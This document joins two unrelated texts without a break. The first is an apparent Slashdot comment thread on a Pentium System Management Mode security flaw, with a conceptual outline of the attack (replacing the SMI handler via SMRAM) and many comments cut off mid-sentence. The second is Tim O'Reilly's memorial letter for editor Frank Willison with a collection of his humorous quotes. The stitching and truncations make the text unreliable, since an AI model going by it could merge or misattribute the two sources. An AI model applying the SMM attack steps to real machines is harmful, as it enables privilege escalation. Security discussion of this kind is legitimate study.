"One of my health principles is: keep your body guessing. If you constantly change what you're doing, serious maladies can't build up an infrastructure. That's why I smoke a couple of cigarettes a week. It leads the body to think you're a smoker, but when the germs set up to attack your lungs, you go out for a jog instead. It foils the germs and leaves them dispirited."
On the Editor's Group
"In honor of e-business, I'm changing the name of my group to e-ditorsdotcom and I'm taking it public. I know that I'm 30 years too old to be the CEO, but I'm hiring a 20-year-old thespian to play the role until after the IPO. You know, I'll be a sort of Cyrano d' Entrepreneur."
On Editing
"Editor, edit thyself, I always say."
|
http://oreilly.com/news/frank_0701.html
|
crawl-002
|
refinedweb
| 4,336
| 72.46
|
using namespace std;in all your programs. To answer your question, yes you need to include
using namespace std;for strings. You could also use std:: before each string std:: = standard namespace. It would be used in this manner.
using namespace std;
class stringor
class coutand there will be no conflict.
using namespace std;then you bring in everything from the std:: namespace. This is not limited to just things that you use so it can get dangerous because you are bringing in hundreds of classes and functions. To limit the number of objects you are bringing in, try:
using std::cout;This will bring in only std::cout.
|
http://www.cplusplus.com/forum/general/97472/
|
CC-MAIN-2015-22
|
refinedweb
| 109
| 75.3
|
User talk:JJJWegdam
OpenRailwayMap/Tagging in Netherlands
The page OpenRailwayMap/Tagging in Netherlands is intended as a tagging documentation of railway mapping and tagging in the Netherlands. Please move the contents describing the proposed import of ProRail data to an independent page outside the OpenRailwayMap namespace. Thank you. --Nakaner (talk) 20:25, 24 March 2015 (UTC)
Today I rebuilt the page in order to meet the same setup as their counterparts from other countries. Could you check if you are okay with it's current setup? Apart from that, I never intended to link the ProRail import proposal to ORM; it was on the ORM page in order to inform possible Dutch ORM mappers about the data source. Granted: the old setup made it look like it was a project by ORM. I changed the tekst concerning ProRail in order to present it as plain as possible. Kind regards. --JJJWegdam (talk} 20:10, 29 March 2015 (UTC)
File:Dutch_speed_signals.png
Do you have the source-files of File:Dutch_speed_signals.png?
JoKalliauer (talk) 16:50, 10 July 2017 (UTC)
Dear JoKalliauer,
It is indeed true that I have the source files. I created them using Microsoft Office's Visio, for the purpose of OpenRailwayMap.
Best regards, JJJWegdam
JJJWegdam (talk) 00:55, 13 August 2017 (UTC)
- In the German Wikipedia someone would like to use the pictures [1]. In which file-format did you create the signals (dwg,dxf,svg,png,pdf,eps)?
- Could you upload the source file to (for png,svg,pdf) or to (for dxf,dwg,eps) or send them per email (and under which License f.e. Cc-zero (everyone is allowed to use/modify it, without nameing the author/source) or f.e.Cc-by-sa-4.0 (The author has to be named))?
- JoKalliauer (talk) 10:03, 13 August 2017 (UTC)
|
https://wiki.openstreetmap.org/wiki/User_talk:JJJWegdam
|
CC-MAIN-2018-39
|
refinedweb
| 305
| 63.8
|
Agenda
See also: IRC log
<trackbot> Date: 30 March 2011
<danbri> yesterday's notes:
<danbri> draft minutes:
<matt> Scribe: danbri
discussing recap from yesterday
role/value of rdf
oh might be useful, 'Select the name, lowest and highest age ranges, capacity and pupil:teacher ratio for all schools in the Bath & North East Somerset district ' (uk open linked data example)
<martinL> test
<matt> trackbot, start meeting
<trackbot> Meeting: Points of Interest Working Group Teleconference
<trackbot> Date: 30 March 2011
<JonathanJ> see yesterday's minutes :
JonathanJ, yes I think that might be useful. Perhaps in terms of exploiting externally maintained data (e.g. school-related info)
<inserted> scribe: matt
<danbri> ahill mentioning eg. from yesterday, ... not a POI but potentially a movie showing in a local POI
<danbri> ronald, see also
[[introductions around the table again]]
<danbri> 15 Gigs of OSM data: -dontcrashyourbrowser- .de/pub/openstreetmap/planet-110323.osm.bz2
<scribe> Scribe: matt
Martin: I'm the CTO of Mobilizy/Wikitude.
Thomas: Bertine and I are working on an AR browser at a company called LostAgain.
cperey: Who has implemented a browser?
[[everyone but Matt and Dan]]
<scribe> scribe: cperey
Matt: new agenda
<matt> -> Day 2 Agenda
<danbri> 'lost again':
Matt: AR Landscape Drafts
... what Jonathan has put up and the AR vocabulary, to extend the core work, what is the shape of this, get an editor
Alex: do we have room for AR Notes? Yes, Landscape Note is part of what we will do
Matt: our charter
<matt> POI Charter
Matt: first is POI recommendation. Then, the charter says that we will produce two AR Notes. A note is slightly less rigorous thing
... could be published on our web site. Vocabulary to extend teh core recommendation Might include presentational characteristics... could include anything
... we have started the Vocabulary at all yet
... have NOT started yet
<danbri>
Matt: we have AR Landscape.
<danbri>
<matt> scribe: matt
cperey: It's not a gap analysis document
... This is more of a product feature landscape an inventory of what's in the products today.
... I'm looking to codify the standards that describe the different functional blocks that AR uses.
<scribe> scribe: cperey
<scribe> scribe: matt
cperey: I think that this is will focus on those parts that are about making AR on the Web. There may be scenarios where there is a client.
<scribe> scribe: cperey
matt: this is just a starting point. we will discuss it. I think this will evolve into a gap analysis of current standards wrt the Web and AR.
Ronald: is this group chartered to look at the full range of AR?
... or are we going to focus on POI
Matt: we are broader than just the POI in this area
bit from the charter... Dan... we should begin the conversations
Matt: there is distinct possibility that when we get core draft done, we can recharter
Alex: but I tihnk what Ronald is asking about is the AR note
<danbri> (so where are we collecting info about geo APIs: e.g. ...etc etc ...?)
Alex: my feeling that the AR notes was restricted to what this group is chartered to speak about
... what is the POI we are putting forward and how it applies to AR
<matt> danbri, I'd suggest adding them to:
Alex: if it includes talking about 3D, then great, it probably means that talking about Device APIs, we don't need to cover the whole gamut
... in some sense, a landscape of all existing browser is not a requirement of our discussion, to understand how we go forward
... it is not necessarily in our charter that we cover all of that depth
<danbri> 'The WG may also publish use case and requirements, primers and best practices for Points of Interest as Working Group Notes. ' --
Matt: should we look at list of mobile user agents on browser page
<danbri> (so if someone e.g. wanted to make a 'how real projects are putting geo-related info in QR Codes, imho that'd be in scope for a separate Note)
martin: supported platforms could be added to the tables
Matt: Jonathan how d you want to proceed?
Jonathan: I'd like to talk about the document
... as mentioned, the landscape is main document, browser document is the details of one area
... I have discussed with many Korean people and community
... gathered many criteria so far
... first, is the comparison targets. I think we need to make a narrow scope for AR apps
<danbri> (matt, ok I've added them to )
Jonathan: because too many applications in AR domain. We can make technical specification for our standard. We need to narrow the scope
... I have written the features. First the .. second, linking to web services, third is rendering, fourth is...
... Collected a list in the document, about 13 products
... Christine made some comments. this are on the page
Alex: where do we the line? our browser is not commercially supproted
... it is in teh iTunes store but anyone can make an application. it's penetration is negligible but the features are important because it demonstrates some of what we are talking about
... some applications/user agents don't codify AR, read it...
Thomas: the data standard must look at main commercial ones. because if the standard can't do what they say that they do
Martin: mixare is downloadable, available outside of the laboratory environment
Jonathan: need to consider extensibility
Alex: the list is probably right.
Martin: as soon as something is publically in use
Matt: we stop collecting when we have all the features covered
Alex: Google Goggles is AR
... Recognizes a POI
... information about the POI pops up
... it may have features
Thomas: API for visual recognition engine could be on their roadmap. The feature that they have is one which AR browsers will have
Ronald: Visual Search and AR will merge
Martin: we can't separately Geo and Visual
Alex/Thomas: Nokia Point and Find should be added
<matt> ACTION: Jonathan to add Nokia Point and Find: [recorded in]
<trackbot> Created ACTION-38 - Add Nokia Point and Find: [on Jonathan Jeon - due 2011-04-06].
<matt> ACTION: Jonathan to fix link for Wikitude [recorded in]
<trackbot> Created ACTION-39 - Fix link for Wikitude [on Jonathan Jeon - due 2011-04-06].
Alex: Nokia Point and Find at some point you could download it for a phone
... some features I've seen demoed, are not available to everyone, but worth looking at and considering again
<JonathanJ> I was referenced a good report from edinbergh univ. -
Alex: some of the things that Petros mentioned , aggregating POIs into footprint of buildings
... street view like browsing
... so does StreetView belong on this list
Thomas: and you can use the gyro in your phone to see things
Alex: it's not strictly AR
but what should we be focused on?
<matt> Petro/Nokia's position paper
Alex: I want to say that the definition is not tight or exclusive to keep StreetView and Goggles out
... these are close enough to be considered here
<matt> close ACTION-39
<trackbot> ACTION-39 Fix link for Wikitude closed
Alex: it's remote, browser based, worth considering
Thomas: AR is a potential output method, the same data can be viewed on many different applications, in an AR form if appropriate
... non-issue what you call AR or not
Alex: and at some point there will be a maturation of this definition
... like VR, lots of things expanded outside the original definition
<Zakim> danbri, you wanted to ask about qrcodes
Alex: It's a visualization method for POI
Dan: what about QR codes?
... I find AR unconstrained, it's fine, does lots of cool things
... useful for navigation in real time
... QR codes are quite well understood technoogy
... I'd like to make a pitch that they are in scope for this group
... I just want one standards thing taht is part of QR code
<matt> GIST QR codes
Thomas: AR should be small enough to act as a direct link to the data
<matt> [GIST]QR_Code_Data_Representation_for_AR.pdf QR Code Data Representation for AR
Thomas: QR code is very limited in what and how much it can store
Alex: I second what Dan is saying
<danbri> can we resolve unanimously that this group hopes to make some contribution around the use of QR codes for POIs? (whether documenting existing practice, or suggesting a design...)
Alex: for the notes, for us considering the implications of a POI standard, this use case of seeing a QR code and sanpping it is applicable
... it should be in scope
Martin: looking at the list, these are all mobile applications
... we should also include in scope non-mobile applications
... like Total Immersion things on desktop
Alex: but didn't you (Jonathan) want to restrict it to mobile browsers
<danbri> re QR code capacity, see my thread last year on lengths of URIs 'in the wild'
Alex: at the same time, you could imagine street view
... if you have been excluding it from the discussion is the wrong thing to do
Thomas: it would be ludicrous if you had to pull down data from one source for desktop and a different place for mobile
<danbri> oops wrong link. 'URI length statistics "in the wild"?'
Thomas: for content providers that would be a show breaker
... we want to avoid all the systems that labs have done but at the same time, it is appropriate to include StreetView
Alex: I recommend that it be included in the list
Thomas: if you are dealing with image relative position, there is a great advantage to including them
... at the end of the day it is a marker and a model (3D model) on the marker
... a standard way of associating a marker and a 3D model regardless of where it is would be useful
Jonathan: we need more time
Luca: my feeling for AR is that it is something that you put on the real world
... for example, StreetView it is not exactly AR. Desktop can be included as long as you use a webcam to put things in teh real world
<JonathanJ> It is not problem, what product is included or excluded
Luca: for me, for what I include when I think AR, it is display of information on top of the real world. Google Maps is not AR. You do not see the real world
<danbri> Luca, not everyone can see...
Alex: if you are walking down the street and you take away the background
Jacques: you are switching from AR to mixed reaity
Dan: is AR only for people with good vision
Thomas: geo-located sound is in scope
Alex: he's talking about it is synthesized background. but if you take away the backgrond ad you see the same content, the same rendering engine is doing
... that is Ar
<JonathanJ> I don't think AR only for people with good vision.
Luca: because we don't have to be on the street for us to have AR experience
... I don't want to say that only geo located can be AR. It can be visual recognition, sensors, printers, etc all of this is included and in scope
<JonathanJ> ISSUE: what AR is our scope
<trackbot> Created ISSUE-6 - What AR is our scope ; please complete additional details at .
Alex: overall features.... is there anything on this list that doesn't make sense. I see the idea. Does it have an SDK
... is it using Points of Interest?
Jonathan: I can see that filling out this table is going to get messy. Everyone is going to be full of caveats
Thomas: what user interaction standards should be defined
... define a click action
Alex: for me the biggest differentiation is Web 1.0 and Web 2.0
... whether you can put your finger on it and stretch the world, manipulate the model
... data representation is an important feature to add
... I think is of value. We use KML and HTML for Argon
... I don't know what Acrossair does
Martin: Acrossair is closed and proprietary system
Alex: edits into the document
Thomas: should the data representation be separate from the POI? Is that important? Is that relevant to discuss
Alex: for first pass, we list what we know about these things.
... filling in the table
... does anyone at this table know anything about Google Goggles data representation
Thomas: it is probably going to be like MapAPI
<martinL>
Alex: how they do it. this is where the rubber meets the road
<fons> s/probsbly/probably
Ronald: you get XML back and you get a URL to which you can go
Alex: is that a POI? Did it return a POI?
Martin: is a POI tied to a location?
Alex: if I'm standing in front of building, and I shoot an image, and I get the name of the building, have I got a POI?
... yes
Thomas: whatever links the real world to the virtual content is POI
Alex: I pick up my phone and I look at the courtyard and I see a Polar bear. it is AR.
... nothing is there but a lot of people who argue it is a POI
... sometims these lines are difficult to draw
... we agree that kooaba is returning data and POI
Ronald: It's JSON. No ties to any other standards at this time
Alex: but the JSON is returning POI and data
... maybe because what we need is a column that describs how we are triggering in some sense
... Have it in the table
... why don't we change user interaction
Dan: finish the column
... ovijet
... put proprietary
Jonathan: they are visual search
<fons> s/tey/they
Alex: what is sekaicamera
... it is social AR in geospace
... this doesn't answer the question of data representation
Sekai camera is also JSON
<matt> Mixare JSON docs
Alex: wikitude
Martin: ARML, based on KML
Alex: when we say KML we mean XML
Thomas: the format is same but KML has things already sorted , already specifies location
Alex: what is the difference between name space and ...
... markup language
Dan: XML was born as a simplification of SGML
... it XML was created, they wanted to interleaved
<matt> xmlns is the default, prefix is the non-default ones
<danbri> re XML namespaces see
<JonathanJ> There are a missing point. I want to compare from 1st cloumn (Data Representation) what they support 2D, 3D format.
Coffee break.
Alex: it's become obvious that we need to focus on our objective. We don't have time to flesh out the document here
... we need to focus on what's available and how our POI standard effect people who want to deliver AR
... how do we answer that
Matt:
Matt: technologies listed here. some with work going on in W3C
<JonathanJ> see
Matt: gyroscope work in progress
... microphone work in progress
Thomas: these are all very big things,
martin: there are other people doing work on these
... as a reference, we should point to others who are working on this
Dan: I don't see video feed here
Jonathan: add camera input
Matt: add the applicable standards
Alex: where are we going to put this
<matt> scribe: ahill
thomas: should we separate device access standards from POI standards?
<cperey>
<matt> ACTION: matt to add links to existing standards [recorded in]
<trackbot> Created ACTION-40 - Add links to existing standards [on Matt Womer - due 2011-04-06].
<danbri> (finished editing now)
<cperey>
agreed
thomas: what about user rotation in the POI spec?
ronald: we've discussed the orientation of content, but not the orientation of the user
martin: we need to separate meta data of POI, geo-location and data representation (visualization)
<matt> scribe: cperey
martin: we need a clear separation. We go to this point and not further
Alex: I never felt that our responsibility would be to render teh content
... the question is how do we facilitate teh data coming with the POI
Thomas: there is some overlap, may want inline data with teh POI you don't want to link to a remote text file if you want only a two line...
Bertine: maybe a CSS?
Alex: we all have in our minds, ideas of POIs that include lable and description
... you're saying that's so cannonical that we don't want an extra standards for describing that
... does this argue that there should be a place in teh standard to relate that?
Thomas: you wouldn't embed a JPEG in an HTML page
... same with a model. If you have a short bit of text it makes more sense for it to be in line
... it has to be related
... needs to be standard for a simple label annotation. It needs to be in a Standard
Ronald: we have name primitive in our browser
... style sheet is not directly part of POI Spec
... you can say that POI Spec has a couple of fields but up to the specific browser to show content of a particular type
Thomas: but does the creator of content want to specify how it is visualized?
Ronald: yes, but not in the POI spec
... the question is if it is part of POI. Or if you have a link to the visualization within the POI
ThomasL should POI include a class reference
Martin: KML does something like that
Essentially what you have is an XML represetnation of a POI
Martin: do we define a new POI standard. KML defines almost everything we have talked about
... our proposal is to eliminate all of the stuff we do not need in AR
... we pull the KML tags we need and we add AR tags we need
Alex: let's say that the way you describe coordinates, if you disagree with that then you would be leaving the standard
Thomas: simple differences like Lat vs. Latitude
Alex: funny to hear say that. Dan was showing how we could put RDFa into a web page. Lots of angle brackets. Seems a little verbose
... point of view, perspective changes the definition of "verbose"
probably not worth it for us to invent another way to represent
Alex: at some point we are going to need to peruse other standards and come up with ways to improve them
WGS84, etc
Alex: we need to get down to brass tacks and say who's description we are adopting and what we think it is going to look at
<matt> trackbot, close action-40
<trackbot> ACTION-40 Add links to existing standards closed
Alex: wouldn't necessarily throw out KML if verbose, if millions of people are using it
Thomas: you establish key value pairs and maybe in a few year's time, the changes may come
Matt: eXdInterchange
<danbri> re XML compression, see Efficient XML Interchange Evaluation
<matt> Efficient XML Interchange WG and specs
<danbri> . "
<JonathanJ> matt, I think we need cooperate with DAP -
Alex: back to KML, we were talking about representation.... I'm not... not to say it's not the right way to approach it but in our KARML version, we take desription tag
and it is HTML. YOu can have styles. Put some text in and browser would render as a default, but you can add HTML for presentaiton. You could imagine extending , add some SVG instead
Alex: so in that case, now the data is inline with the POI
... the isue is that in some circumstances we want a link to presentation data. so effectively, we get the POI data, it has a link to Web Page, and that's the data we want to present in AR
... yesterday we were looking at the entire web page. bottm line is the minimal set that we want to allow people to inline
Dan: there are part of the HTML ....
you can ask it to bring back a really simple version
Dan: can't remember the header names. At the HTTP level thre's a whole set of ...
<matt> alex: How common is content negotiation?
matt: very common, gzip
<matt> matt: Depends on the content types. For instance, most browsers support saying "I accept HTML, and gzipped HTML" -- this is widely deployed.
content negotiation, if we define a format with its own MIME type, one of its characteristics could be its compressed
Dan: wikipedia might implement it
<danbri> see
Ronald: web servers also try to figure out what type to send
Alex: but that's not reducing what gets sent, it is an efficiency
Thomas: yes it is
Martin: one question return to. What metadata
... do we really need a separate POI Standard separate from what already exists? can't we just pull out what we need form KML?
Marin: what tags would we really need?
Alex: we agree with you in general
Matt: we would take a profile of GML and augment with our specific vocabulary
Thomas: we need metadata. If there's an existing standard we should use it
<danbri> (re existing standards, also )
Alex: we only chose KML because it was the broadest adopted markup
Not because we said it was the most/best
Alex: so yes, if you say GML, I agree
... I imagine in the future what we are adding to the dialog is quite small
matt: Yes, it could be a profile of GML.
Martin and Alex are in agreement
<JonathanJ> s/profiel/profile/
<Zakim> danbri, you wanted to assert that extensions shouldn't be an afterthought
Dan: yeah there's all these existing standards
... we've already begun picking up common elements
... story how they are the same is useful. Strongest we can do is extensibility
... figuring out the specific use cases, to specify how different datasets are represented
... connecting hop between what other's do and what AR does/needs is what we can do
Thomas: ...
... it needs to be automatically coming up when the conditinos are right
Dan: value adding services need to be able to bring out their data and the people to publish POI data to provide connections between their data and other data without W3C coming up with new vocabulary
Thomas doesn't need to define a movie database format
Dan: example of semantic markup,
<matt> scribe: Matt
ahill: When you say linked data is the way to go, can you describe it? I'm walking down the street looking for particular data, and you're talking about returning links?
Thomas: machine readable links.
ahill: My browser could follow these links and add information from these databases. We don't need to reinvent how to do that by any means.
... What do we need to do to facilitate this?
... Some people might argue that we would need a registry to facilitate these things.
Thomas: I don't think so.
danbri: Maybe at a high level to bring them all together, but the Web is it's own regsitry.
<JonathanJ> see Linked Data -
danbri: I'm walking along and my phone is relating my location to some service. I get a notification that there is a movie playing nearby with actors you like in it.
ahill: My project is relaying this to proxies who then go find this information out, rather than from the device directly.
... What is the difference between agent based semweb stuff and AR?
thomas: I don't think there is one.
ahill: Good, rather than reinvent the wheel we can piggy-back on other efforts.
cperey: I want to throw a monkey wrench in this: you haven't paid for this information. There should be a token to authorize that agent. It's not all just for free.
-> scratch pad
cperey: Then there are ethics, laws. Is this person looking for illegal stuff?
... I just looked at a building and it had one picture, but now it has another, who has the rights for changing that?
Thomas: I don't think that's up for us to implement it.
cperey: Don't you want it in a standardized fashion?
Thomas: There are already standards for these things, SSL, certificates, etc.
cperey: Then we need to write that there are other standards that we could use.
ahill: I don't see the AR uniqueness here. So we don't have to worry about it then.
Ronald: There are security standards.
ahill: People are solving those problems already.
cperey: People aren't solving the problem of predatory real-estate.
Thomas: There's not going to be a one-to-one relationship, the user choses to accept whatever datapublisher they wish.
... If I use a mail service, I'm going to have their ads, that's known. Whatever source we use is going to be responsible for the adverts, etc.
ahill: Another thing we're doing in Argon is offloading to the proxy server under the acknowledgement that search becomes a bigger issue when you walk over to a place and it has 1000 POIs, that's a mess. Your trust network, who your friends or whatever, is really going to affect it.
... We have to acknowledge that at one location there will be a large number of things people have vied to get there.
<Zakim> danbri, you wanted to say 3 things before brain fills up: i) thinking about incentives is good; in my simple scenario, tushinki haveincentive to get customers ii) those are real
danbri: You're right to think about incentives. In the movie case, they want customers. If we do something as simple as Facebook, they'll get customers.
... The social issues exist. We'll have to look at them.
... And last, oauth is a big piece of this. They want their app to work and be deployable to lots of devices. OAuth seems to be the solution of choice at the moment for that.
Thomas: I think there is a lot of power to come from it. I don't think it's up to us to decide on that.
... The spec shouldn't require a third part auth.
Ronald: Responding to Christine's suggestion to standardize the too much content problem: I'm not sure that's really feasible. Are search engine results standardized in how they order things?
... No. That area of discovery of information, I'm not sure it's standardizable.
... It's a real problem for AR, but not necessarily one that gets solved by standardization.
Thomas: It's a big issue and so much room for innovation that I think that is where clients will differentiate.
cperey: How do you formulate the query could be standardized, but not how the response is formulated.
... When I heard query POI I was thinking: "Oh, that's talking about a directory of POIs", which isn't the same thing as querying.
... "These are my circumstances, here's a query for that" vs a directory of layers/channels.
<danbri> (ahill, if someone queries for Amsterdam Red Light District, their AR service(s) should route them to )
<danbri> (but that's a marketplace thing)
Ronald: In the end from our findings, it was quite difficult to get to something that the user really valued.
ahill: With them being the authority.
... No one on the web has defined how to index content in a standardized way.
cperey: There's SEO. In libraries we used the Dewey decimal system and found that to be useful.
bertine: I think the difference with the library example is that books are static.
Thomas: It could start off fantastic and then get swamped with ads.
... The order shouldn't be defined, but the request could be, is that right?
Martin: Web pages care about being ordered, but that's all search engine based.
Ronald: There is part of the HTML specification with keyword metadata.
... That gives content providers a way to find the right information.
ahill: Sounds like when possible we could leverage such things.
Thomas: metadata on the Web isn't useful anymore, hard to trust.
... search engines basically ignore metadata these days.
ahill: That's a shifting tide thing though. Might have been useful years ago though.
<danbri> google do use
ahill: So how do we standardize around it?
Thomas: There will likely be AR search engines that look into the AR data and figure out if it's being abused.
<danbri> (you need another signal for trust and quality, eg. google rank, or facebook LIKE, ... then metadata can be exploited)
cperey: Is this matching our agenda?
matt: Is it what the group wants to talk about?
ahill: I think we should talk about these things now.
... I think the tone is that AR is going to be visually based. I think people see that as something very different than the kind of AR we have today.
... I think the points where these things come together is maybe location and description.
... Take the visual sensor example. I'm agnostic about the sensor.
cperey: That whole thing is heavily what the interface that the sensor web folks worked on.
Thomas: That's why I like to call them triggers.
... I'd argue that the POI has to contain the trigger.
matt: I don't understand why trigger has to be a unique part of the structure?
Ronald: I think we said that the trigger is part of the location primitive, maybe not using that word.
<JonathanJ> I'd like to suggest to make another document, something like "Requirements and Use Case for Linked POIs" by danbri
ahill: I could do a search around me and get 100 POIs around me, one of them is this cup. Some people want to call this a trigger, some people like me want to just say "I have the means to know I am in front of this cup".
Thomas: The difference I see is the metadata what you use to search with, while the trigger is an automatic thing.
... For instance the only ones that are in the field of view are triggered.
danbri: It's not up to the objects to determine that.
<cperey> trigger position paper
ahill: Looking at a web page there's a ton of links. You scroll down and click on any of these things with the mouse. The triggers thing seems to be a way to simplify that, but it's more complicated than that, I could have preferences, etc.
Thomas: I'm thinking it's just more of a passive thing. Something that appears merely by association. A browser may or may not display them. I think there's a clear differentiation between active and passive things.
<cperey> trigger by Thomas
martinL: I think location then is a trigger as well.
matt: Why isn't any data in the POI a trigger?
Ronald: It sounds like search criteria.
Thomas: While you could search to have something appear automatically, it's not automatic. I search and don't get all of those results popping out all at one time.
<JonathanJ> POIs could be crawlable by search engine ?
Thomas: With AR there's a lot more automatic than the Web. We can't just have users activating everything manually.
<cperey> in the public mailing list
Thomas: I think it's the association of where the content creation believes the data should be put, whether it's image/location/sound based. That's slightly different than what the user wants to see at any given time.
ahill: Imagine there's a landscape with one item. The author specifies where it is, what it looks like,etc. That's AR, I don't need the word trigger yet to filter that.
... I need an argument for the word trigger now.
Thomas: I think you need a way to represent the association.
... A way to associate the data you want and an intended location.
martinL: Alex said filter, I like that, that's essentially what it is.
cperey: no!
ahill: We're talking about filter at one place, and then this trigger that describes the POI that is there.
bertine: It's trigger like a landmine, not a trigger like a gun.
Thomas: We can call it something else if trigger is confusing.
danbri: I found it confusing on the mailing list.
ahill: It's a linkage between place and content.
Thomas: I'd say it's part of the linkage.
... There's two parts: what causes it and what goes to it.
... The trigger is what causes you to go to it.
danbri: So is it up to the client to recognize the class of thing?
Thomas: Yes.
ahill: Is this linkage a POI that the spec is to connect data (SVG, HTML, COLLADA models) to a context of the user. That is our charge.
... Then when you talk about seeing a pen and using a trigger, it makes it confusing.
... A lot of people think "I see this and something is going to happen" -- that's a somewhat different subject.
<danbri> 'trigger' for me has a strong imperative reading, ... that the 'triggering' is inevitable
Thomas: The POI is a link between real and virtual.
... I was using trigger or whatever the word is to indicate the category of the sensor that you're correlating to.
ahill: So, there is a unique item, if I got a description of how to recognize it visually, I could dereference that eventually to the exact location on this table and then it's just like a movie theater, or whatever.
... So it's the same, but a different matter of how we get there.
... Then there's the example of "every pen that looks like this" -- which is a reasonable use case, but to me it's more of a pattern than a trigger to me.
<JonathanJ> POI trigger is like this ? -
ahill: Now, say every building from a company sets aside an area for AR, and that's a pattern. Buses could have a sign on the side --
Thomas: How do you find it if the data isn't there in the POI?
ahill: I know I'm in a store, I look at my coordinates, dereference and I'm done.
Thomas: But that store is static. This is ludicrous, then the bus must relay it's coordinates to a server then the client has to fetch it.
... I have nothing against publishing moving coordinates.
... I also think that POIs should be able to specify relative coordinates. I just don't think you can limit it to just the coordinate space.
ahill: This just isn't unique to the domain of visual recognition. I think we will use visual recognition, I'm just saying that visual triggering can happen the same way by other means
... I'm more inclined to push it towards a special case in some sense.
Thomas: To me we need both. The most basic visual recognition is QR codes. That's literally just an image that is then decoded to a URL.
ahill: But that's not a trigger, that's just a linkage.
Thomas: We're associating an image with data, that's just as useful as associating coordinates, whether static or moving.
... The POI needs the capacity for both.
ahill: We need both, but they're not different enough in my mind that they can't be handled.
Thomas: I'm just saying a field in the POI that has coordinates or an image.
ahill: This is what Ronald was alluding to, that a location could have a visual description of pen.
Ronald: And it can be a combination of geo and visual too.
cperey: How it's stored is part of the POI, but not what is in there.
Ronald: Sure, the algorithms will change, etc.
cperey: The device which detects those conditions on behalf of a user, whether mobile or stationary, is using sensors.
ahill: Something like identifying a particular pen could have a number of criteria, so how do you author it. My sensor is going to be picking up that pen all over, but it's not necessarily going to be triggered.
Thomas: The system would have the image criteria already in it's memory.
cperey: You're never looking at the real object, you're just encoding those unique features that identify that class of object. Only those features, so you have an extremely fine sample, you're not walking around sending entire photographs of the pen around to be detected.
Ronald: Most of the time you're sending an image from the mobile to a server.
Thomas: There can be client side recognition.
cperey: But the point is the server side would probably just maintain the extracted features for recognition.
ahill: if I want to recognize this computer, I take multiple image that then get distilled down to something recognizable.
<Carsten> Morning, just wanted to have a quick look at what you guys are doing
martinL: I don't think there's a chance of standardization there as under different conditions have different better algorithims.
<danbri> (lunch-7.5 mins and counting....)
<Zakim> danbri, you wanted to discuss pre-lunch recap. Any actions arising?
danbri: Where are we? We've been chatting, but what action items are coming out of this?
cperey: We've been here before, and we've had people with agendas from geo-physical data that they want to solve.
ahill: And they didn't want this in scope.
matt: That's not what I saw at the last f2f.
cperey: In the next few minutes, the composition of the people in the group has shifted a bit. And it can shift back.
ahill: This is the part of the meeting where we are addressing AR stuff. We are talking about what are the implications? How does the POI stuff relate to AR?
cperey: This is entirely in scope as the subject of long/lat.
... And the traditional problems of those who own large POI databases?
ahill: Our existing spec solves that. It allows the POI database folks to add WGS 84 coord and a name/description/ec.
... Our existing spec also allows for a pen POI with a visual description and an unknown location.
<danbri> (this is a good time to have people make commitments to do things, and to record those in the issue tracker. I'd be happy to take an action to summarise what I could find out about encoding of URIs in QR Codes, for example)
ahill: In my mind I've got a search that includes "pen's that belong to Layar" -- I have those POIs, but I may not be displaying them. To me that's not any different than a POI that's on a building over there that's occluded by a building over there.
... I don't see it as any different than things popping in there.
Thomas: 99% of the time they'll be preloaded, there is a lot of precaching and displaying later.
ahill: You're interests, your context at the moment, those things all determine context that determine which POIs are in my browser currently.
danbri: If this room has a POI, there's a URI to it.
Thomas: QR code could be the link.
<scribe> ACTION: danbri to summarize URIs in QR codes to POIWG group [recorded in]
<trackbot> Created ACTION-41 - Summarize URIs in QR codes to POIWG group [on Dan Brickley - due 2011-04-06].
ahill: In my mind our spec at the moment could work for a QR code with linkage to some data.
... I could imagine a QR code being the equivalent of a pen being recognized.
Thomas: There's also the case where the QR code could contain the POI itself, QR codes don't have to be links.
ahill: Practically what is happening? I see a QR code, it's got a URL, I get back a POI. It needs to be linked to something physical, maybe it's a marker to track, or the QR code itself, or four inches from the phone. That's the POI, the QR code is a specific means to encode the URL and there's a separation there.
Thomas: I am seeing a scenario where the QR code decodes to a link which has a POI which then may link to the 3D model.
... But the QR code could be just the POI itself and go directly to the 3D model.
<JonathanJ> QR code can encode in other many information bytes.
ahill: I see that you want to be pragmatic about the links followed etc, but I'm not sure that's what we need to accomodate in our charge.
Thomas: Perhaps not specifically, but it would be nice.
... We're talking a minimal spec and lots of optionals. Maybe the small thing could be in a QR code.
ahill: In our lab we worked with markers for ever, and now they're totally out. We recognize full-on images, which doesn't have any data encoded in those images. I could imagine that some day if we did push for QR codes that people would laugh at us in the future.
Thomas: I see advantages to not having the data require a separate lookup.
ahill: I think no one here wants to create a byzantine set of links.
... We've had a lot of discussion but no consensus.
<JonathanJ> we need raise issues
ahill: I think we can resolve that our POI standard that we've put forward accommodates many different scenarios.
... Whether it handles triggers, image recognition, etc. I've resolved in my mind that we haven't excluded any of those things. We haven't excluded any representations too, like COLLADA models, or HTML.
... I think that's valuable, as someone always pipes up on something like this and then we have the discussion again. I don't think we should have to do this conversation again.
<danbri> do we agree? "..."
<JonathanJ> +1
<Ronald> +1
PROPOSED.
<Luca> +1
<cperey> +1
<JonathanJ> s/%1D//
Thomas: future issue: are the different criterias and-ed or or-ed?
<danbri> ... not hearing any objections; are we resolved?
ahill: True. I think people handle lots of this sort of thing in code. I think if people want conditions... they write code..
Thomas: It's a fair point that we don't want to go into the logic too much.
... If you make a web page you don't have to code the functionality of a link. Metaphorically we're working on the equivalent of that, right?
ahill: I won't disagree with that. We're trying to provide some structure that keeps people from writing code to present data.
cperey: Is this called a "data format"?
... Because the OMA folks said specifically say they're considering doing an AR data format.
... I think these two words have universal meaning.
ahill: I'm concerned about making such a statement that is someone will say "POI is not an AR data format". I'd be inclined to say that our POI data format can be used for AR and we have specifically taken note of it. We haven't created a specific AR data format, but we believe it could be applied to that.
<JonathanJ> "AR data format" can include anything
ahill: I'd be hesitant to say it's an "AR data format".
Ronald: There's a reason there's a Core data format.
matt: And part of that is because there are other things that will use the POI format without being AR.
ahill: AR is the linkage format.
<danbri>
<danbri> another use case where the publisher has incentive to be found: Best Buy stores:
<danbri> ACTION: danbri identify relevant specs for rotation/orientation included at point of photo/video creation - what is current practice? [recorded in]
<trackbot> Created ACTION-42 - Identify relevant specs for rotation/orientation included at point of photo/video creation - what is current practice? [on Dan Brickley - due 2011-04-06].
